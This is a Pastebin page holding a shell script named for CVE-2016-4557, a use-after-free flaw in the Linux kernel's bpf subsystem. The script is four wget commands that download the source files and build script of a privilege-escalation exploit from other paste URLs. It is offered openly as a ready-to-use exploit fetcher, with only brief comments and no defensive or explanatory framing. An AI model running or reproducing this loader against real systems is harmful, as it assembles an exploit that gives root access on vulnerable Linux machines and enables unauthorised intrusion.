Advertisement
_d3f4ult

CVE-2016-4557.sh

May 9th, 2016
2,262
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.41 KB | None | 0 0
  1. #!/bin/sh
  2. # CVE-2016-4557: use-after-free flaw via double-fdput in bpf
  3. # https://bugs.chromium.org/p/project-zero/issues/detail?id=808
  4. #
  5. # if compile.sh doesnt work, then:
  6. # apt-get install libfuse-dev
  7. #
  8. wget http://pastebin.com/raw/yvbC7k96 -O suidhelper.c
  9. wget http://pastebin.com/raw/FNUqPd4p -O hello.c
  10. wget http://pastebin.com/raw/5k17RHXK -O doubleput.c
  11. wget http://pastebin.com/raw/UKa1uFSR -O compile.sh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement